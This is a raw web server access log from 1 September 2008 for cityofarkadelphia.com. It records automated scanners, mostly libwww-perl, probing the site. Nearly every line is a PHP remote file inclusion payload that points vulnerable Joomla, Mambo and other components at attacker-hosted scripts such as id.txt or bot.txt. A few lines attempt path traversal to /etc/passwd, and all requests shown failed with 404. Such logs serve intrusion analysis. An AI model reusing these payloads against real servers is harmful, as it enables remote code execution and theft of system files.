97.102.114.191 - - [01/Sep/2008:09:41:00 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.208.118.47 - - [01/Sep/2008:09:41:46 -0700] "GET /logs/access_080201.log/index1.php?info=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
88.208.118.47 - - [01/Sep/2008:09:41:46 -0700] "GET /index1.php?info=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
88.208.118.47 - - [01/Sep/2008:09:41:47 -0700] "GET /logs/index1.php?info=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.229.252.17 - - [01/Sep/2008:09:42:06 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
84.19.180.232 - - [01/Sep/2008:09:44:02 -0700] "GET /logs/popup.php?path=http://titureddo.altervista.org/vacanze/pinogino.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
84.19.180.232 - - [01/Sep/2008:09:44:02 -0700] "GET /popup.php?path=http://titureddo.altervista.org/vacanze/pinogino.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:09:45:11 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:09:45:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:09:45:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:09:45:16 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:09:45:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:09:45:17 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:09:45:44 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:09:45:44 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:09:45:45 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.11.67.242 - - [01/Sep/2008:09:47:01 -0700] "GET /logs/access_080330.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.11.67.242 - - [01/Sep/2008:09:47:01 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.11.67.242 - - [01/Sep/2008:09:47:01 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:09:48:46 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:09:51:14 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:09:51:14 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:09:51:14 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:09:52:51 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:09:52:51 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
89.108.67.208 - - [01/Sep/2008:09:54:31 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.67.208 - - [01/Sep/2008:09:54:31 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.67.208 - - [01/Sep/2008:09:54:32 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:09:55:06 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:09:56:30 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:09:56:30 -0700] "GET /logs/access_080329.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:09:56:30 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
151.1.210.49 - - [01/Sep/2008:09:58:31 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
151.1.210.49 - - [01/Sep/2008:09:58:31 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:09:58:31 -0700] "GET /logs/access.log/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:09:58:31 -0700] "GET /errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:09:58:32 -0700] "GET /logs/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
217.198.149.178 - - [01/Sep/2008:09:59:21 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.severo-zapad.ru/i/Admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
151.11.24.250 - - [01/Sep/2008:09:59:23 -0700] "GET /logs/access_080329.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
151.11.24.250 - - [01/Sep/2008:09:59:23 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
151.11.24.250 - - [01/Sep/2008:09:59:23 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.14.46.18 - - [01/Sep/2008:10:00:27 -0700] "GET /logs/access_080201.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:10:00:54 -0700] "GET /logs/access_080501.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:10:02:29 -0700] "GET /logs/access_080201.log/components/com_simpleboard/image_upload.php?sbp=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:10:02:29 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:10:02:29 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:10:02:56 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:10:02:59 -0700] "GET /logs/access_080329.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:10:03:29 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:10:03:29 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:10:04:01 -0700] "GET /logs/access_080329.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.87.154.41 - - [01/Sep/2008:10:04:01 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://borneo.siteburg.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
195.170.179.50 - - [01/Sep/2008:10:04:23 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/scanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.170.179.50 - - [01/Sep/2008:10:04:28 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/scanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:10:06:20 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.22.110.198 - - [01/Sep/2008:10:06:31 -0700] "GET /logs/access_080701.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.110.198 - - [01/Sep/2008:10:06:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:06:36 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:06:36 -0700] "GET /logs///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:06:36 -0700] "GET ///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.22.110.198 - - [01/Sep/2008:10:07:19 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sunshineaviation.com/osticket/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:10:08:54 -0700] "GET /logs/access_071201.log////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:10:08:54 -0700] "GET ////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:10:08:55 -0700] "GET /logs////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.108.67.220 - - [01/Sep/2008:10:09:37 -0700] "GET /logs/access_080701.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.67.220 - - [01/Sep/2008:10:09:37 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.67.220 - - [01/Sep/2008:10:09:37 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.67.220 - - [01/Sep/2008:10:09:40 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:09:53 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:09:53 -0700] "GET ///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:09:53 -0700] "GET /logs///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:09:53 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:09:53 -0700] "GET ///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:10:09:53 -0700] "GET /logs///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:10:10:12 -0700] "GET /logs/access_080101.log/components/com_simpleboard/image_upload.php?sbp=http://borneo.siteburg.com/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:10:10:20 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:10:10:26 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:10:10:26 -0700] "GET ///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:10:10:26 -0700] "GET /logs///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:10:10:51 -0700] "GET //move_articles.php?cfg[path][contenido]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:10:10:51 -0700] "GET /logs//move_articles.php?cfg[path][contenido]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [01/Sep/2008:10:10:51 -0700] "GET /logs/access_071201.log//move_articles.php?cfg[path][contenido]=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.221.68.20 - - [01/Sep/2008:10:10:59 -0700] "GET /logs/access_080501.log/index.php3?s=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "cityofarkadelphia.com"
66.221.68.20 - - [01/Sep/2008:10:10:59 -0700] "GET /logs/index.php3?s=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "cityofarkadelphia.com"
66.221.68.20 - - [01/Sep/2008:10:10:59 -0700] "GET /index.php3?s=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:10:11:15 -0700] "GET /logs/access_080330.log////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.187.101.14 - - [01/Sep/2008:10:11:24 -0700] "GET /logs/access.log/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
210.127.253.224 - - [01/Sep/2008:10:11:26 -0700] "GET /logs/access_071201.log////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
210.127.253.224 - - [01/Sep/2008:10:11:26 -0700] "GET ////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
210.127.253.224 - - [01/Sep/2008:10:11:27 -0700] "GET /logs////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.187.101.14 - - [01/Sep/2008:10:11:29 -0700] "GET /errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.187.101.14 - - [01/Sep/2008:10:11:34 -0700] "GET /logs/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
210.127.253.224 - - [01/Sep/2008:10:13:50 -0700] "GET /logs/access_080330.log////admin.php?include_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.198.149.178 - - [01/Sep/2008:10:13:53 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.severo-zapad.ru/i/Admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
217.198.149.178 - - [01/Sep/2008:10:13:53 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.severo-zapad.ru/i/Admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
217.198.149.178 - - [01/Sep/2008:10:13:53 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.severo-zapad.ru/i/Admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
212.24.137.42 - - [01/Sep/2008:10:14:04 -0700] "GET /logs/access.log/index.php?body=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
83.208.64.192 - - [01/Sep/2008:10:14:04 -0700] "GET /index.php?body=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
212.24.137.42 - - [01/Sep/2008:10:14:05 -0700] "GET /logs/index.php?body=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
83.208.64.192 - - [01/Sep/2008:10:15:06 -0700] "GET /logs/access_080201.log/index.php?body=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
212.24.137.42 - - [01/Sep/2008:10:16:03 -0700] "GET /index.php?body=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:10:16:38 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:10:16:43 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.208.64.192 - - [01/Sep/2008:10:17:19 -0700] "GET /index.php?body=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
151.1.210.49 - - [01/Sep/2008:10:17:34 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
151.1.210.49 - - [01/Sep/2008:10:17:35 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
151.1.210.49 - - [01/Sep/2008:10:17:45 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
151.1.210.49 - - [01/Sep/2008:10:17:45 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:10:17:54 -0700] "GET /logs///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:10:17:55 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:10:17:55 -0700] "GET ///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:10:19:03 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:10:19:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.11.67.242 - - [01/Sep/2008:10:19:55 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
